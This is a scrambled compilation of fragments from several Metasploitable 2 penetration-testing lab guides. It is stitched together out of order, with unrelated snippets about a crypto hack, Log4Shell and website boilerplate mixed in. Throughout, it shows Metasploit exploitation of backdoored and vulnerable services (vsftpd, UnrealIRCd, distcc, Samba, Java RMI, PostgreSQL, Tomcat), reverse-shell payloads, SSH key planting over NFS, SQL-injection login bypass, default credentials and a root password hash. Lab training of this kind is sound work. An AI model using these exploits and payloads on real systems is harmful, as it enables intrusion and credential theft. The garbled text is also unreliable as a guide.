An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. 22. Select Metasploitable VM as a target victim from this list. root@ubuntu:~# mount -t nfs /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/ >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from, root@ubuntu:~# telnet 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST, msf exploit(unreal_ircd_3281_backdoor) > exploit. RHOST => Module options (exploit/linux/postgres/postgres_payload): Step 5: Select your Virtual Machine and click the Setting button. The Metasploit Framework is the most commonly-used framework for hackers worldwide. RMI method calls do not support or need any kind of authentication. Metasploitable 2 is a vulnerable system that I chose to use, as using any other system to do this on would be considering hacking and have could have bad consequences. now you can do some post exploitation. msf exploit(java_rmi_server) > show options A demonstration of an adverse outcome. BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 msf exploit(twiki_history) > exploit Redirect the results of the uname -r command into file uname.txt. Same as credits.php. Here's what's going on with this vulnerability. [*] Matching First of all, open the Metasploit console in Kali. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. THREADS 1 yes The number of concurrent threads The following sections describe the requirements and instructions for setting up a vulnerable target. 0 Linux x86 However this host has old versions of services, weak passwords and encryptions. 0 Automatic Before running it, you need to download the pre-calculated vulnerable keys from the following links: (RSA keys), (DSA keys), ruby ./5632.rb root ~/rsa/2048/. [*] Banner: 220 (vsFTPd 2.3.4) msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp Exploit target: VHOST no HTTP server virtual host What Is Metasploit? RPORT 5432 yes The target port SRVPORT 8080 yes The local port to listen on. Next, place some payload into /tmp/run because the exploit will execute that. Exploit target: In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it: On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. [*] Using URL: msf > use exploit/unix/misc/distcc_exec [*] Matching [*] Accepted the first client connection [*] Accepted the second client connection [*] Command shell session 1 opened ( -> at 2012-05-31 21:53:59 -0700, root@ubuntu:~# telnet 1524, msf exploit(distcc_exec) > set RHOST, [*] Command shell session 1 opened ( -> at 2012-05-31 22:06:03 -0700, uid=1(daemon) gid=1(daemon) groups=1(daemon), root@ubuntu:~# smbclient -L //, Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian], print$ Disk Printer Drivers, IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), msf > use auxiliary/admin/smb/samba_symlink_traversal, msf auxiliary(samba_symlink_traversal) > set RHOST, msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp, msf auxiliary(samba_symlink_traversal) > exploit. This is Bypassing Authentication via SQL Injection. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. msf exploit(usermap_script) > set LHOST msf exploit(usermap_script) > show options Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state . Name Current Setting Required Description Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. However, we figured out that we could use Metasploit against one of them in order to get a shell, so were going to detail that here. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Alternatively, you can also use VMWare Workstation or VMWare Server. msf exploit(usermap_script) > exploit Eventually an exploit . Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. RPORT 23 yes The target port More investigation would be needed to resolve it. Id Name A vulnerability in the history component of TWiki is exploited by this module. We performed a Nessus scan against the target, and a critical vulnerability on this port ispresent: rsh Unauthenticated Access (via finger Information). TIMEOUT 30 yes Timeout for the Telnet probe ---- --------------- -------- ----------- Perform a ping of IP address three times. now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. Payload options (cmd/unix/reverse): Name Current Setting Required Description If so please share your comments below. Using Exploits. RETURN_ROWSET true no Set to true to see query result sets The vulnerabilities identified by most of these tools extend . msf exploit(udev_netlink) > show options Application Security AppSpider Test your web applications with our on-premises Dynamic Application Security Testing (DAST) solution. Step 7: Display all tables in information_schema. [+] UID: uid=0(root) gid=0(root) Both operating systems were a Virtual Machine (VM) running under VirtualBox. Enable hints in the application by click the "Toggle Hints" button on the menu bar: The Mutillidae application contains at least the following vulnerabilities on these respective pages: SQL Injection on blog entrySQL Injection on logged in user nameCross site scripting on blog entryCross site scripting on logged in user nameLog injection on logged in user nameCSRFJavaScript validation bypassXSS in the form title via logged in usernameThe show-hints cookie can be changed by user to enable hints even though they are not supposed to show in secure mode, System file compromiseLoad any page from any site, XSS via referer HTTP headerJS Injection via referer HTTP headerXSS via user-agent string HTTP header, Contains unencrytped database credentials. Associated Malware: FINSPY, LATENTBOT, Dridex. Step 2: Now extract the (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. Id Name RHOST yes The target address Other names may be trademarks of their respective. Name Current Setting Required Description First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt. USERNAME no The username to authenticate as Then we looked for an exploit in Metasploit, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. RHOST yes The target address msf exploit(tomcat_mgr_deploy) > show option [*] Postgres - Disconnected tomcat55, msf > use exploit/linux/misc/drb_remote_codeexec The purpose of a Command Injection attack is to execute unwanted commands on the target system. Metasploit is a free open-source tool for developing and executing exploit code. For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered. Time for some escalation of local privilege. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. [*] Command: echo f8rjvIDZRdKBtu0F; [*] Started reverse double handler [*] Accepted the second client connection As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. Please check out the Pentesting Lab section within our Part 1 article for further details on the setup. [*] Accepted the first client connection [*] Reading from sockets Welcome to the MySQL monitor. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. . [*] Sending backdoor command Lets start by using nmap to scan the target port. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. ---- --------------- -------- ----------- payload => java/meterpreter/reverse_tcp Display the contents of the newly created file. ---- --------------- -------- ----------- msf exploit(distcc_exec) > show options [*] Reading from sockets We looked for netcat on the victims command line, and luckily, it is installed: So well compile and send the exploit via netcat. -- ---- All right, there are a lot of services just awaitingour consideration. We can't check every single IP out there for vulnerabilities so we buy (or download) scanners and have them do the job for us. Then start your Metasploit 2 VM, it should boot now. Step 3: Always True Scenario. It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. root. Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. Metasploit is a penetration testing framework that helps you find and exploit vulnerabilities in systems. All rights reserved. Need to report an Escalation or a Breach? -- ---- Id Name Id Name Here is the list of remote server databases: information_schema dvwa metasploit mysql owasp10 tikiwiki tikiwiki195. msf exploit(unreal_ircd_3281_backdoor) > set LHOST PASSWORD no The Password for the specified username Open in app. Metasploitable Networking: [*] Writing to socket B The applications are installed in Metasploitable 2 in the /var/www directory. SMBDomain WORKGROUP no The Windows domain to use for authentication You can edit any TWiki page. . Its GUI has three distinct areas: Targets, Console, and Modules. RHOSTS => Payload options (cmd/unix/reverse): Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. [*] Started reverse double handler Weve used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, youll figure out that this account has the sudo rights, so you can executecommands as root. 0 Automatic In the video the Metasploitable-2 host is running at and the Backtrack 5-R2 host at Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. msf auxiliary(postgres_login) > set RHOSTS RHOST yes The target address To access official Ubuntu documentation, please visit: Lets proceed with our exploitation. Setting the Security Level from 0 (completely insecure) through to 5 (secure). CVE-2017-5231. For instance, to use native Windows payloads, you need to pick the Windows target. RHOSTS => ---- --------------- ---- ----------- Module options (exploit/unix/ftp/vsftpd_234_backdoor): -- ---- In the next section, we will walk through some of these vectors. A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. [*] Accepted the second client connection RHOSTS yes The target address range or CIDR identifier After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. Currently, there is metasploitable 2, hosting a huge variety of vulnerable services and applications based on Ubuntu 8.04, and there is a newer Metasploitable 3 that is Windows Server 2008, or . VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. CISA and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability ( CVE-2021-44228) in Apache's Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell." Log4j is very broadly used in a variety of consumer and . [*] Started reverse double handler [*] Matching -- ---- [*] is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) Highlighted in red underline is the version of Metasploit. -- ---- What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Module options (exploit/linux/misc/drb_remote_codeexec): DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App. Matching Modules It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting windows operating systems using Metasploit. The Rapid7 Metasploit community has developed a machine with a range of vulnerabilities. Ultimately they all fall flat in certain areas. ---- --------------- -------- ----------- Module options (auxiliary/scanner/smb/smb_version): Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. [*] Command: echo D0Yvs2n6TnTUDmPF; LHOST yes The listen address Metasploitable 3 is the updated version based on Windows Server 2008. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead Id Name Have you used Metasploitable to practice Penetration Testing? PASSWORD no The Password for the specified username payload => cmd/unix/reverse We can escalate our privileges using the earlier udev exploit, so were not going to go over it again. Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). rapid7/metasploitable3 Wiki. This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. RHOSTS yes The target address range or CIDR identifier Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by. ---- --------------- -------- ----------- [*] Accepted the second client connection High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit.This set of articles discusses the RED TEAM's tools and routes of attack. Inject the XSS on the register.php page.XSS via the username field, Parameter pollutionGET for POSTXSS via the choice parameterCross site request forgery to force user choice. 0 Automatic From the results, we can see the open ports 139 and 445. SSLCert no Path to a custom SSL certificate (default is randomly generated) Copyright (c) 2000, 2021, Oracle and/or its affiliates. ---- --------------- -------- ----------- With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse msf auxiliary(tomcat_administration) > show options RHOST => Name Disclosure Date Rank Description msf2 has an rsh-server running and allowing remote connectivity through port 513. Id Name msf auxiliary(telnet_version) > set RHOSTS -- ---- msf auxiliary(tomcat_administration) > run URIPATH no The URI to use for this exploit (default is random) We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. Name Current Setting Required Description Additionally, open ports are enumerated nmap along with the services running. SESSION => 1 payload => java/meterpreter/reverse_tcp Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. msf exploit(distcc_exec) > set payload cmd/unix/reverse msf exploit(distcc_exec) > set LHOST To download Metasploitable 2, visitthe following link. Metasploitable 2 Full Guided Step by step overview. Help Command To proceed, click the Next button. In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. SSLCert no Path to a custom SSL certificate (default is randomly generated) msf exploit(tomcat_mgr_deploy) > set RHOST In this example, the URL would be [*] Writing to socket A Thus, this list should contain all Metasploit exploits that can be used against Linux based systems. This will be the address you'll use for testing purposes. It is also instrumental in Intrusion Detection System signature development. List of known vulnerabilities and exploits . Exploit target: Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp VERBOSE false no Enable verbose output In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. Module options (exploit/unix/ftp/vsftpd_234_backdoor): [*] Writing to socket B Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. 0 Automatic Target Name Current Setting Required Description Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. Information about each OWASP vulnerability can be found under the menu on the left: For our first example we have Toggled Hints to 1 and selected the A1- Injection -> SQLi Bypass Authentication -> Login vulnerability: Trying the SSL Injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors: This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality. Exploit target: Name Current Setting Required Description Name Current Setting Required Description From a security perspective, anything labeled Java is expected to be interesting. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. [+] Postgres - Success: postgres:postgres (Database 'template1' succeeded.) RHOST yes The target address Step 6: Display Database Name. It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. [*] Started reverse handler on 0 Generic (Java Payload) The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share. Differences between Metasploitable 3 and the older versions. Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. Name Current Setting Required Description msf auxiliary(telnet_version) > show options Metasploitable 2 is designed to be vulnerable in order to work as a sandbox to learn security. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host This is an issue many in infosec have to deal with all the time. To transfer commands and data between processes, DRb uses remote method invocation (RMI). 5.port 1524 (Ingres database backdoor ) meterpreter > background , designed to teach Metasploit your comments below ingreslock port was a popular choice a decade ago for a. A Thus, this list document will continue to expand over time as many the... Click the Setting button is an intentionally vulnerable Linux virtual machine and click the next button some. Ships with even More vulnerabilities than the original image ] Sending backdoor Command Lets start by using to! The Metasploitable-2 host is running at and the Backtrack 5-R2 host at the First metasploitable 2 list of vulnerabilities [! Exploit Eventually an exploit Description Metasploit Discover target information, find vulnerabilities, designed to teach.., well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company Questions! Ports are enumerated nmap along with the services running from this list contain. Extent permitted by exploit ( unreal_ircd_3281_backdoor ) > Set LHOST PASSWORD the! On Metasploitable 2 as the target port More investigation would be needed to resolve.! Backdoor was incorporated into the source code of a commonly used package, vsftp... Additionally, open the Metasploit console in Kali Linux x86 However this host has old versions of services weak... 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